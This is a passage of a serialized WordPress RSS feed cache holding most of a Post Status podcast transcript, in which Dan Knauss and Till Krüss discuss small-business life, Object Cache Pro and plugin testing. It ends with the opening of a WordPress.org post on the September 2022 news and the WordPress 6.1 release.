listed on my website officially, who already, you know, signed up. There\'s a few bigger announcements coming now with Word Cam BS that I don\'t think I can talk about or would be, It\'s not my [00:22:00] place to her to share these things.</p>\n\n\n\n<p>Um, but yeah, I just, I wanted to. I wanna do this, do things my way. That was, it was really important to me, and I\'m really glad I did because I\'m also seeing that I don\'t think I\'m a good employer. Um, unlike people. What\'s his face? Joshua? Joshua Trouble? Yes. I think he was a really, it\'s, he seemed, Maybe you can leave some notes here.</p>\n\n\n\n<p>If, if anybody\'s working for him. He seems like a really good boss and, I\'d like to be like him, but I\'m not, or at least not at this point. And may, maybe I\'ll get there and I want to grow and scale. What, what I would like is I would like someone to come in, be the CT cto, as ceo, take over the company, and I\'m down with whether this is raising money or.</p>\n\n\n\n<p>Getting, you know, with all the acquisitions, I think it makes sense for a established, skilled team to come in and grow this. But as long as I\'m [00:23:00] not on my own, but have a very small team, which I have right now, I don\'t, I don\'t wanna just grow and grow and grow. That\'s not my, I wanna create a good product.</p>\n\n\n\n<p>I wanna have happy customers and not have depression because I\'m burning the candle at both. . Yeah. Do</p>\n\n\n\n<p><strong>Dan Knauss:</strong> do you think that, that to me doesn\'t, man, I, I, I resonate with that a lot. I, I feel that a lot. I, I feel like there\'s a lot of, well, maybe not a lot, but proportionally, but that there\'s a, there\'s a culture in, in WordPress among developers and, and others that is kind of the smallest, beautiful Yeah.</p>\n\n\n\n<p>Approach. And have you found other, like others? Kind of supporting, validating that or other people you think have done</p>\n\n\n\n<p><strong>Till Krüss:</strong> that except that all the smallest beautiful gets bought up. . Yeah, they do. But then because we have these, oh, what do you call them? [00:24:00] Conglomerates now, like with the cloud waste acquisition today, um, by digital ocean.</p>\n\n\n\n<p>There are these giant, I dunno, visually speaking skyscrapers, you know, there\'s a bunch of them, but there are so many CRAs in the pavement in between that where smallest, beautiful can grow and you have like beautiful little happy, healthy flowers. I don\'t know what the, where the analogy is going. Um, There\'s space to grow.</p>\n\n\n\n<p>There\'s always issues in between where you have small companies that can solve a problem that there\'s so many that exist in workers and create a really good solution, and then they will grow and maybe they\'ll be bought up and integrated in the big sky scrapers. Maybe not that, that it doesn\'t really matter.</p>\n\n\n\n<p>There\'s always space for small, whether it\'s a startup or just a small business or your, your site project to, to flourish. I.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah, I was thinking of John Christopher, who\'s you, you probably saw some of that in post [00:25:00] Slack and his give attention because it\'s an unusual, um, approach with organized wp. Um, yeah, he goes way back with, He\'s very intentional about it.</p>\n\n\n\n<p>I think that\'s actually a project that has a previous plugin behind it goes back 10 years or so. So even when he was doing search WP and from what I was reading and hearing, A large part of it sounds, sounds like you, where part of the thinking is not just a technical or revenue oriented planning, but how is this something that fits into my life where my relationship with my customers is meaningful?</p>\n\n\n\n<p>Um, and that kind of connects with what I\'m hearing from you about like yeah, you don\'t want the, the stress. Over promising and delivering cuz your own scale has gotten out. Like, that\'s, that\'s what I\'ve found most painful and personally a barrier in, um, [00:26:00] freelancing. You know, if, if you\'re doing you, it doesn\'t, it wasn\'t, it\'s not something that quality can maintain at, at scale and to the extent you put relationships and maybe in your own community, into your clients, um, that really matters.</p>\n\n\n\n<p>Like you, uh, you feel. Like you\'re letting people down if, if you can\'t, so, and I don\'t, I think they\'re at a point of scale. No one cares anymore. Right. They don\'t care. A big conglomerate, like you\'re not a successful</p>\n\n\n\n<p><strong>Till Krüss:</strong> number. The customer service, this is always what I think about, and I\'m sure I\'ve shared this once or twice before where I don\'t wanna interact with.</p>\n\n\n\n<p>Customers or people like this. I have my friends and I have my personal world where I wanna interact with humans, but on the internet there\'s too many sketchy people out there. So to me, one big goal was to keep customer service as minimal. And what\'s the opposite of hostile? Um, peaceful . As [00:27:00] nourishing as possible to me being an open source maintainer for, I dunno, 18.</p>\n\n\n\n<p>18 years maybe. Mm-hmm. started with like half a mint back in the day, if anybody remembers that. Yeah, I do. Only the old people and Sean Inman, Iam, I dunno what his name is, but, um, you know, this analytics software, being an open source maintainer for so long, I, I saw the progression. Maybe I\'m so jaded now.</p>\n\n\n\n<p>Maybe the internet has changed and there\'s more people now I\'m not. But back in the day, it was really pleasant to interact with users of my software that I wanted to write and publish for free. And over the years I just saw that it\'s more, not more and more, but the percentage of shitty and hostile and interactions.</p>\n\n\n\n<p>I don\'t know if I can curse on this podcast here. Um, I think just the F word probably, maybe I\'ll refrain from using it became. It\'s more [00:28:00] unpleasant to me. And with object aspro, I wanted to have the same thing where I, I make a software, people pay me for the service every month to use the best of the best, but they didn\'t talk to me.</p>\n\n\n\n<p>That was my, my goal. And instead of keeping them away and not responding to customer service requests, I wanted to create software that is so stupid, reliable that they don\'t have to talk to me and bring back everything I learned from my many years in the Laville community. Bring this back. Test driven development, reliability as a, as.</p>\n\n\n\n<p>The number one core value of, of the software, not performance, not all the fancy belts and whistles and, and cool designs, not reliability, just you install it and you don\'t have to think about it because it just works. If there\'s an error, it recovers by itself. That was the intention because I don\'t wanna do customer service as my, my, my life, and.</p>\n\n\n\n<p>Again, I could scale and hire people, but I know why have a whole customer service team, What if the [00:29:00] software just works? And right now it\'s slowly changing over the last, let\'s say, I think it\'s almost three years now in ste, in November, um, two and a half years, let\'s say the majority of my days is I work, I do whatever I want, I can, I can drive my businesses forward, whether it\'s the sales and marketing or whether it\'s software and I.</p>\n\n\n\n<p>Have been doing five minutes of customer service so far, and now it\'s slowly getting to like 10 minutes a day, which is still delightful to me, but it\'s 10 minutes now. I\'m not stoked about it, so I\'m working on making all these questions that over and over ask, and in the customer service chat or emails I integrate into the software, so I wanna bring it down to five minutes by just making it more intuitive, more reliable, and more.</p>\n\n\n\n<p>Explan explanatory. Explanatory. Kind of like the apple iPhone where you, it just works for the most part, right?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Some, I, I can, I can hear people, I, I can read minds of [00:30:00] like, you know, you, you\'re talking on the one hand of like putting yourself out of business almost. But on the other hand, I can also imagine a lot of WordPress plug-in developers and, and far beyond that.</p>\n\n\n\n<p>10 minutes. 10 minutes a day. One guy on support. That\'s, that\'s like paradise . Yeah. Cause the, the, the, for years and years and, and ongoing, the, the, probably the single most common, um, uh, complaint and, and it\'s more than a complaint. It\'s a life. It\'s a quality of life. Mm-hmm. issue when you listen to developers and product owners with.</p>\n\n\n\n<p>With a support desk and it\'s, it\'s where the highest frustrations are and where they end up spending its money, time, and, and your mind.</p>\n\n\n\n<p><strong>Till Krüss:</strong> Mm-hmm. . So, and to me it\'s, my personally till this thing here, it\'s my happiness, my, [00:31:00] my contentment, and how I feel about life. Doing a lot of customer service is not part of that.</p>\n\n\n\n<p>Right.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. Uh, to be honest, both sides of that transaction don\'t really want to be in there. It\'s not, um, it\'s not where we wanna spend our time.</p>\n\n\n\n<p><strong>Till Krüss:</strong> Yeah. And if it\'s five minutes a day, I can put in the energy. I can be quite nice and helpful. But if it would be 2030, if it\'s an hour, and like this is what I gotta do if I wake up and.</p>\n\n\n\n<p>Have a coffee and new customer. So it\'s just, I don\'t wanna do it. I would probably sell the business to Digital Ocean and, and move on. It\'s, that\'s not the life that I wanna live. Right. Yeah.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> What, what allowed you to, to know that about yourself earlier on? So that just seems unusual. What, what takes you down that, that path of knowing your limitations and know?</p>\n\n\n\n<p>What you want when it\'s the opposite of what everything else says, like go and grow. This is a form of growth, but it\'s not the [00:32:00] stereotype, the one we always think about of bigger, more people, more tickets that come with our support tickets. Mm-hmm. .</p>\n\n\n\n<p><strong>Till Krüss:</strong> What? Think. Think what\'s? I think, I think the Ansys iowaska, psychedelic substances.</p>\n\n\n\n<p>What do you call them? plant medicines, if you wanna say. I think that\'s the answer. It could also be just I, because I\'m near atypical, I have to do things my way. Maybe that\'s it. But I definitely, as a human, I value introspection and self inquiry. It\'s top of my list of things that I like to do in life and with myself and what drives me and what I find interesting in myself and understanding how do I.</p>\n\n\n\n<p>How to still function and how do other people work, which is a lot more challenging sometimes because there\'s someone that can be so irrational and self inquiry and [00:33:00] psychedelics allows me to. Or has allowed me to just be more self-aware than I was five years ago, 10 years ago, and just increase that. If that\'s a quantifiable number, which I don\'t, maybe it isn\'t, get to know myself more of like what makes me happy, what makes me, what helps me be content, or what nourishes me, What drains me, and being self-aware I am, I\'m a huge fan of that, that self inquiry.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah, there\'s no, if you don\'t leave any room for it, it\'s, it\'s gone. And that time is gone. I, I feel you on that. Um, yeah. The last five years have probably, for almost everyone, have been possibly the toughest, um, in our lives. I, I think that\'s probably not that unique. And a big part of it for me is, um, along with, with remote relationships and remote.</p>\n\n\n\n<p>and social isolation happening at the same [00:34:00] time that there\'s, um, it\'s been a complicated, um, situation to keep enough of your own head space and relationships and, and things like that, um, that are, that are closer to home. That, you know, traditionally we find our identity and grounding and meaning and, um, Yeah, it\'s just gotten so much harder.</p>\n\n\n\n<p>And it sounds like you\'ve kind of gone the, the opposite, opposite direction. Pretty successfully with, with that, ironically, by, as, as other people scale up and develop all these inefficiencies, here\'s this guy with this, with this product that solves that problem to some extent, remaining this kind of calm.</p>\n\n\n\n<p>Center of the wheel , it\'s like I\'m imagining the, the nun, everything else spinning around and you\'re trying to [00:35:00] do as few, uh, as little, as little movement within the center of that as as possible. Um, seems like a smart, desirable way to work. To me, um, it</p>\n\n\n\n<p><strong>Till Krüss:</strong> wasn\'t,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. Have you changed, has anything changed in, in your practices, in, in models or is this pretty confirmed at, at this point, this is how you want to do it?</p>\n\n\n\n<p>You\'re, it sounds like you\'re entertaining some idea of business partners. You know, as long as you have a, a role that allows, allows you to, to have the, the space and, and activity that you want.</p>\n\n\n\n<p><strong>Till Krüss:</strong> I think it\'s, um, it\'s a good question. I dunno if I have an answered this. Um, I,</p>\n\n\n\n<p>because it\'s such a loud voice on the outside, everybody does the same thing. This is how you speak, this is how you [00:36:00] behave. This, there\'s so much conformity and we all wanna do this. As you know, talking apes. Because this, It\'s such a reinforcement. I think it\'s called something cultural head. Gem. Gem. Gem.</p>\n\n\n\n<p>Yeah. That\'s the word. Yeah. This is my ESL coming out here. Where it\'s over and over reinforced that it\'s good to be efficient. As a German, this is, I relate to this a lot, but um, it\'s, efficiency is important. Work is important. First question is, what do you do? Like everything is so work centric that it\'s.</p>\n\n\n\n<p>Sometimes hard to put aside. So I still entertained the thought of like, Hmm, can I do this my way again, , Can I do this in a way that works for me? Can I be efficient or can I support growth my way? It\'s hard to just shut it out because it\'s so dominant in all of, at least the societies that I live in and [00:37:00] the circuits that I live in where money and success.</p>\n\n\n\n<p>What are you doing within like that, the values are just so reinforced externally. That to me to again, find, I\'m gonna quote Joshua Strayer again here. Like, what do I actually wanna do with my life? Um, not that he\'s the first question you ever asked me that, but how do, what do I want? And, and, and forgetting my inner.</p>\n\n\n\n<p>Sometimes happens, and maybe those are the moments that I think about growth and investment. Yeah. And, and scaling out. Um,</p>\n\n\n\n<p>I definitely see to, to switch gears here as well, I definitely see being, working with hosting companies the last couple of years, maybe the last years last year more and. I can make a bigger impact in the workforce community if I would have proper backing and, and, [00:38:00] uh, better team. And seeing now working on this particular product for the last close to three years or three years, probably with the development cycle, I\'m really good at product.</p>\n\n\n\n<p>I\'m good at figuring out with people need. In my five minutes of customer service, I get enough information figuring out what they need. Being technical enough to bridge the gap and, and creating quality products. That\'s kind of the, the pride or that\'s what I\'m proud of or take pride in. And I, in an idea world, I\'d love to focus on that and not think about receipts and my.</p>\n\n\n\n<p>Accounting balances and all these other things. I try to outsource these things, but there\'s so much more to a business, so much more including customer service. Just focusing on product would be, I think, a very idea idyllic state for me to be in, of just, I get to just [00:39:00] create and make the world a better place.</p>\n\n\n\n<p>At the same time, less resource usage, faster, low times, less electricity being used and. Less headaches for people like the, the emotional impact of people worrying about the WordPress websites. That to me is a un quantifiable number that I really like to get higher. Um, why worry about your software? Like, let\'s worry about the relationships that we have or the what we want maybe, um, our ourselves and like these, the things that actually matter.</p>\n\n\n\n<p>So with software is making the lives a bit easier and less annoying. Um, I\'d love to do that. Back to your question of like, has anything changed? Just more and more discovering, running all of this myself and then outsourcing some engineering parts or the, you know, accounting, bookkeeping. Obviously it would be fun to just do product itself.</p>\n\n\n\n<p>Um, it\'s not [00:40:00] my reality at the moment, but I would entertain it if it\'s, if it\'s done right. And I\'ve heard this a few times, whether this is the Pagely acquisition or WP Media, the WP Rocket guys, there seems to be companies out there that are still have a lot of financial backing, but they\'re not,</p>\n\n\n\n<p>I, I don\'t know how to say this. They\'re not cutthroat capitalists. Right machines. Good.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> disadvantage maybe, but worth life. Worth living.</p>\n\n\n\n<p><strong>Till Krüss:</strong> Yeah. Like the, the one group one or one group. Mm-hmm. one.com hosting. And in Scandinavia, they just seem to, maybe it\'s a Scandinavian model. Again, just more focus on Yeah, we all work, we all pick pride in that maybe or identify with what we do for, for, for work.</p>\n\n\n\n<p>But not at the extreme expense of our personal lives.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. [00:41:00] I, I think who\'s gonna argue with that? and feel good, feel like they really mean it. But yeah, that is a, it does seem more and more like that\'s a, a culture and the spirit and ethos that\'s, that\'s been diminished over time. Mm-hmm. in open source and Yeah.</p>\n\n\n\n<p>It needs, it needs advocates in</p>\n\n\n\n<p><strong>Till Krüss:</strong> it\'s, Yeah,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> it\'s a, it\'s good to have voices for that, but there\'s also some really practical things to it. Some of what you were saying, I, I know you, um, if you wanna drive down headaches and inefficiencies and stuff that doesn\'t work and poor quality products, testing is probably your main answer to that.</p>\n\n\n\n<p>For practically speaking, what can WordPress do to. take, take a lot of trouble off of, off of, um, individual shoulders and off, you know, off the project, I [00:42:00] suppose too. Is that, is that accurate that the, the role of testing and standards, um, are an area that we\'re, we</p>\n\n\n\n<p><strong>Till Krüss:</strong> haven\'t, um, yeah. Really matured in? I think so, and I\'m still , I still dislike it, um, but I do it because it\'s, I wanna push a big release on a Friday afternoon and go camping for the weekend without having to worry about it.</p>\n\n\n\n<p>And I\'ve done this a few times now, like I try to release on a Friday afternoon and push big releases to, I don\'t know what, it\'s like 400,000 sites now. Um, Test driven development, whether this is, yeah, whether this is test driven development, meaning first you write your tests and then you write the software, or if you do it after the fact and you spend the extra, you know, 30% I think it is on, on average.</p>\n\n\n\n<p>Um, The extra time to write tests, get to, you don\'t have to chase the [00:43:00] 100% code coverage where every single line is tested, but at least test the major parts of your software and whether this is JavaScript browser integration testing, and when you click this button, something happens and it works. Or this is just following the, the paths and PHP of like when.</p>\n\n\n\n<p>What happens when you flush the cash by cli? Does it actually empty your red estate? Just having sanity checks in place? It\'s a very technical topic. Testing in general, there\'s, what\'s his name? Um, Chris Hard, The grumpy programmer, who is just his whole life seems to be an advocate for testing, um, in, in many, many different communities.</p>\n\n\n\n<p>Not exclusive to php, just test your software. And to me, that allows me to be confident in what I. To trust my own software cuz I\'m very flawed and make mistakes all the time. But my tests will tell me when I do and just have peace of mind over the weekend where I [00:44:00] can, I don\'t have to stress out about pushing out a release that might break other people\'s sites.</p>\n\n\n\n<p>And this has been a very frequent occurrence. And WordPress, anybody from, I\'m not gonna say any names, but I\'m sure we all write the stories that as a release and sudden. I don\'t know. Millions of websites are slower because there\'s no tests, so there\'s no quality. Qa, What\'s it called? Quality assurance.</p>\n\n\n\n<p>Quality qa. Qa, Yeah. There\'s no teams. And whether this is manual or I think it should be automated because why spend human hours trying to do this? Just take the time to write these test. It\'s. It helps me. And then also to this extent of like customers have, I think more trust in the software. When there\'s releases and there\'s no, Oh, buck fix is, Buck fix is buck fixes and many small.</p>\n\n\n\n<p>You can see the the evolution of my free plugin, the Reddest object Cash. Sometimes when I do a big release, they do six [00:45:00] releases and 24 hours. It\'s so many people using it and something breaks for someone. And this is what I wanted to do different with Object Cash Pro. It\'s written from the ground up and it\'s test driven.</p>\n\n\n\n<p>Like there is no, it\'s not, not quite a hundred percent quote coverage at this point, but it\'s a very, It\'s thoroughly tested. Yeah.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Right. And what\'s the barrier to that? Becoming more of the. in WordPress are, are you involved in the on the core test team at all? I know you do. Uhfor the new</p>\n\n\n\n<p><strong>Till Krüss:</strong> performance team.</p>\n\n\n\n<p>No, I\'m not. I see that there is a lot of tests in WordPress core, like it\'s well tested. I think the, not the theme market, but the plugin market itself seems are probably a pain to test the plugin. Industry plugin. Severe is, testing is not a common thing. I, I don\'t see it very much. No few people seem to even talk about it.</p>\n\n\n\n<p>I don\'t wanna be an [00:46:00] advocate for it. I have other things to do. Maybe I should do a presentation at some point at a conference just to like see the, So the seats, what do you call? Put the seats in the ground. Yeah. Yeah. It\'s, uh, it\'s really good. I don\'t know if there\'s anything in the way except for awareness and then actually taking the time to do it.</p>\n\n\n\n<p>It, it, it\'s time consuming. It\'s expensive. If it\'s 30% of the time that you write code, that if it\'s an hour, I don\'t know what 30% is, 20 minutes, 80 minutes, something like that. A third, let\'s say, of that time coding. , you would then spend writing tests. It\'s not fun. I, I don\'t, You can make it kind of fun with like a decent test.</p>\n\n\n\n<p>We, a nice tooling, but it\'s still, you, you, you\'re doing this. However, for me, now down the road, seeing that I have three years of. Software in one place. I don\'t wanna test all these pieces that have written a year ago. They work, they can just stay [00:47:00] as they are, and if they break, I will know down the road and they can actually move a bit faster.</p>\n\n\n\n<p>Now, in the future of like whether this is adding new features or changing how timeouts work. The last release I pushed yesterday was adding connection retries and the few things broke and I, I just know I don\'t have. Abuse . I don\'t have to abuse my customers and they test it on their life production sites.</p>\n\n\n\n<p>My tests will reveal these issues first, which I, I think it\'s the more customer friendly approach to not let your customers test your software. And, um, I listen to the Accidental Tech podcast the other day where Apple kind of dust is at scale. They just throw it out. Developers do the QA for them. I think that was the comment.</p>\n\n\n\n<p>I can\'t speak to that, but it reminds me of this talking about this.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah, very much so. Yeah. Do you, do you think that that, um, WordPress is, you could say relative [00:48:00] isolation or under participation in the larger PHP world is part of the story too, that if, if there was more overlap and more. Mm.</p>\n\n\n\n<p>Relationships in, into, into things like Elle or a Million Possible Directions with, with PHP and is more, more directly involved with it. That, that, that would help, uh, that would enhance some things like, like stand uh, standards around testing and and so on. Um, we just kind of, our ecosystem and people do their own thing cause it\'s, they\'re not.</p>\n\n\n\n<p>They\'re not, um, their peers are in a, in a different place than, say, someone working in, in a, a PHP framework somewhere</p>\n\n\n\n<p><strong>Till Krüss:</strong> else. Yeah. I think there\'s, I mean, there\'s a lot of smart developers on WordPress as well that\'s maybe [00:49:00] cross to, to the other. Ecosystems over outside of WordPress and they include testing, whether this is Google engineers being hired or whatever it is.</p>\n\n\n\n<p>There is, there is good tooling out there. I don\'t think we\'re too isolated. We definitely judge and look down upon, um, understandably so. Maybe that\'s just because of the lack of testing, but I, I don\'t even know how to solve this. To me it\'s a problem and maybe it would be enforcing tests for plugins with more than, I don\'t know, a thousand users on the repository.</p>\n\n\n\n<p>Because you can measure OB objectively. You can quantify the code coverage, whether let\'s say it\'s 80% what, whatever\'s a reasonable or 50%. , I dunno if you can have the main path. I, I, I don\'t know the, the details of this, but you could also enforce it such as like, Hey, you\'ve got now 12 months to test your software, and then it gets a little check mark.</p>\n\n\n\n<p>Hey, [00:50:00] this plugin has a test suite. I would need to build one for my free plugin. Now , But it, it might be a good, good idea and to include in that there\'s been a. Talk in deep What Core Performance? Performance Core, I don\'t know. They just changed the name, The performance team. Mm-hmm. , Um, to have, whether there\'s this badges that.</p>\n\n\n\n<p>When you have a clean, what percent stall you install a plugin. How do the, my queries, like what\'s the impact of this plugin? How is performance being handled? And I dunno how much you can automate these tests, but maybe we need more reviewers that there is more high quality code a. On the wordpress.org, at least for the ones that have, um, you know, a hundred thousand, a million users that you know that these are actually properly tested for performance degradations or recessions, um, regressions.</p>\n\n\n\n<p>Sorry, so many recessions going on at the moment, and for [00:51:00] performance regressions or just for testing, I think that would be a decent approach. I don\'t know if this is feasible. Someone, what\'s her? Epstein, she something. Half Elf is on a Twitter profile. I don\'t, Yeah. You know what I\'m talking about. Yes. Um.</p>\n\n\n\n<p>She, I think, runs the plugin team and I don\'t know what of the, what is possible and it\'s of course it\'s a big burden. Again, on that you, we push on open source developers and maybe there needs to be fun. I don\'t know how to solve this problem, but testing would definitely improve the overall trust in WordPress, that you can upgrade a plugin without things going slow or breaking.</p>\n\n\n\n<p>I think it would be a good approach and. I would say it\'s certainly part of the secret sauce for Object Cash Pro and its success. It just, you can trust that it\'s reliable. Yeah. And business is first. Well,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> as an alternative to putting it on on.org, there\'s always the possibility I\'ve wondered about this, like why the, I\'m not aware of this happening, but [00:52:00] in a maturing market and ecosystem that I think we do have, there\'s the possibility of industry.</p>\n\n\n\n<p>cooperation and self-regulation to some extent, where you, those larger plugin, um, companies could on their own, see the, see that value and decide on a standard amongst themselves some common tooling or, or practice or something like that and do their part to kind of police that end of the, the market or set an example that, that sounds like.</p>\n\n\n\n<p>Very strong policing, but I mean you\'re, you know, pleasing bugs. Um,</p>\n\n\n\n<p><strong>Till Krüss:</strong> oh, we already have guidelines for the plugins, what you can and can\'t do. Yeah, it\'s very clear and they all make sense. Maybe adding performance and test coverage to that could be at least a discussion. I\'m sure it has been. I will talk to Felix at work, us about this on the country today.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Good. That\'s, uh, yeah, that\'s definitely a, a [00:53:00] progressive direction to, to move in. Um, where, where do you see, um, opportunities and, you know, for, for you and, and just WordPress in general, where are they, where are the opportunities and I guess the, the risks and, and threats. People would often seem to have more of those in mind, but, um, how those two relative quantities is they\'re, Which is more on your mind and, and what are you, what are you seeing down the road?</p>\n\n\n\n<p><strong>Till Krüss:</strong> probably with everybody. I\'m more, I think more about the risks. Yeah. And threat than the opportunities. The monkey brand. Mm-hmm. , I don\'t know if an answer to, if I have an answer to this, I, some of them are a bit concerned of like, how long is WordPress around? , but it doesn\'t, it\'s not slowing. Maybe this is just like you said, the talking apr, [00:54:00] I, it\'s not slowing down.</p>\n\n\n\n<p>There\'s acquisitions everywhere. I don\'t see it dying out for whatever reason. All the replacements like it\'s.</p>\n\n\n\n<p>I guess, yeah, I don\'t know. I, I, I don\'t, I don\'t think I have an answer to that question. Sorry.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> That\'s fine. It\'s a big, big, wide open one. Um, I, I think a lot of, a lot of things you, you\'ve touched on, I wish I, you know, we, we hear more, and I, I hope resonates with, uh, a lot of people. We don\'t often connect the human social embeddedness of our lives with the.</p>\n\n\n\n<p>We\'re doing or not openly or we don\'t share that and, you know, why else are you doing what you do? Um, some people are pretty open about it, but, um, I would, I would like to hope that there\'s, there\'s opportunity in this space for people who wanna work that way, who are wanna work like you [00:55:00] do, and that this is, this is a good model that however big everything else may get.</p>\n\n\n\n<p>There\'s those cracks, like you said, between. The sidewalk where there\'s room for a relatively low stress. Good, good work. Um, and</p>\n\n\n\n<p><strong>Till Krüss:</strong> I\'m glad you found that. If there\'s any more questions, if, if you like listening to this, if you enjoy the, the, this conversation, the stories, if there\'s anything the listeners want to hear more about or any questions, I\'m always happy.</p>\n\n\n\n<p>You can hit me up on Slack, on post status, Slack for of course, WordPress, Slack email. You know, or send questions to Dan and we can do, uh, if there\'s the demand for it. Uh, episode two on this.</p>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 13:15:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WordPress.org blog: The Month in WordPress – September 2022\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13596\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/news/2022/10/the-month-in-wordpress-september-2022/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14922:\"<p>September was an exciting month with the return of many in-person WordCamps, WordPress Translation Day, and preparations for WordPress 6.1. Contributors across teams continue to work hard to ensure that the last major release of the year is the best it can be for everyone. Let&#8217;s catch up on all things WordPress.</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<h2>Countdown to WordPress 6.1: Coming November 1, 2022</h2>\n\n\n\n<p><strong>WordPress 6.1 is scheduled for release on November 1, 2022</strong>—less than three weeks away. Following the beta releases in September, the <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">first release candidate (RC1) is now ready for download and testing</a>.</p>\n\n\n\n<p>Members of the release squad hosted a casual walk-through of some of the expected WordPress 6.1 features last month. ​​<a href=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\">The recording and transcript are available in this post</a>.</p>\n\n\n\n<p>This next major release focuses on increased control for a more intuitive site and content creation experience, and will be bundled with a new default block theme, <strong>Twenty Twenty-Three (TT3)</strong>. This theme comes with <a href=\"https://make.wordpress.org/design/2022/09/07/tt3-default-theme-announcing-style-variation-selections/\">10 style variations designed by community members</a> that you can easily switch between to customize the look and feel of your site.</p>\n\n\n\n<p>Other exciting updates include <a href=\"https://make.wordpress.org/core/2022/09/26/core-editor-improvement-catalyst-for-creativity/\">enhanced consistency of design tools across blocks</a>, a <a href=\"https://make.wordpress.org/core/2022/08/25/core-editor-improvement-refining-the-template-creation-experience/\">refined</a> and <a href=\"https://make.wordpress.org/core/2022/07/21/core-editor-improvement-deeper-customization-with-more-template-options/\">expanded template creation experience</a>, improved Quote and List blocks, and support for <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/#fluid-typography-support\">fluid typography</a>.</p>\n\n\n\n<em>Selected style variations for the Twenty Twenty-Three theme.</em>\n\n\n\n<p><strong>Want to know what else is new in WordPress 6.1?</strong> Check out these resources for more details:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/09/24/roadmap-to-6-1-core-companion/\">Roadmap to 6.1: Core Companion</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Field Guide</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/wordpress-6-1-accessibility-improvements/\">​​WordPress 6.1 Accessibility Improvements</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-field-guide-for-wordpress-6-1/\">Performance Field Guide for WordPress 6.1</a></li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Take part in this release by <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">helping to test key features</a> or <a href=\"https://make.wordpress.org/polyglots/2022/10/11/wordpress-6-1-ready-to-be-translated/\">translating WordPress 6.1</a>.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Gutenberg versions 14.1, 14.2, and 14.3 are out</h2>\n\n\n\n<p>Three new versions of Gutenberg have been released since last month’s edition of The Month in WordPress:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\"><strong>Gutenberg 14.1</strong></a> shipped on September 15, 2022. It adds typography and spacing support for many blocks, continuing efforts to consolidate design tools in blocks. It also includes improvements to the Navigation block and the content-locking experience. This is the last version of Gutenberg that will merge into WordPress 6.1, which will include updates from Gutenberg 13.1 to 14.1.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/09/30/whats-new-in-gutenberg-14-2-28-september/\"><strong>Gutenberg 14.2</strong></a> comes with writing flow improvements, a more polished Calendar block, and autocompletion for links. It was released on September 28, 2022.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\"><strong>Gutenberg 14.3</strong></a> is available for download as of October 12, 2022. This version makes it easier to navigate text blocks with <code>alt + arrow</code> keyboard combinations, and brings an improved drag-and-drop functionality for images, among other updates.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Follow the “<a 